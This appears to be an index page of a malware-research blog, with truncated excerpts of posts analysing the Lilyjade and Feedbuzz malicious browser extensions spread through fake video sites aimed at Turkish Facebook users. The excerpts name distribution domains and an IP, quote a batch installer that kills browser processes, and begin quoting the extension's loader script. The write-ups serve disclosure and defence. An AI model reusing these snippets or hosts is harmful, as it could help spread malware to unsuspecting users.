This is aimed at Turkish Facebook users. The scripts used by the extension are hosted over several domains. The infection starts with the site hxxp://www.videotr.in, which plays a short videoclip. The video is then interrupted and the user is urged to run an exe that is downloaded to fix the issue. The exe creates aRead more...
supervids.net (Lilyjade script hiding behind/proxied by cloudflare)
I was looking at some of the files being installed from a recent posting, when I found something interesting. It looks like someone else is trying out lilyjade. The extensions are held in a self extracting archive and installed via a batch file. @echo off //Kill Proccess TASKKILL /F /IM firefox.exe TASKKILL /F /IM chrome.exeRead more...
LilyJade again
Lilyjade is back and has moved up in the world. After Google chrome prevented the installation of extensions from sources other than the official webstore (due to the actions of malicious extensions such as lilyjade), lilyjade had a problem. Rather than explain the complicated steps needed to bypass the restriction, lilyjade spreaders have bypassed theRead more...
lilyjadev2.com (Malicious browser extension Hosted in the United States by Endicott H4y Technologies Llc)
After posting the latest browser extension malware, I decided to check up on the first posted on the site, Lilyjade. While all of the reported hosts had been shutdown, I located a new one, which claimed to host Lilyjade version 2 Here’s a look at the new version of the Lilyjade malware The first changeRead more...
Feedbuzz.info (Malicious browser extension Hosted in Canada by Sarah Ryan)
Resolved Feedbuzz.info to 184.107.233.186 The extension comes in both firefox and chrome flavors Initial loading comes from a fake youtube page, http://video8244.uni.me The page is loaded from a dropbox account (/u/95827902/), and the extensions are loaded from epicrewards.net Here is the firefox extension source loadScript_you(); function loadScript_you() { if ('https:' == document.location.protocol) return false; varRead more...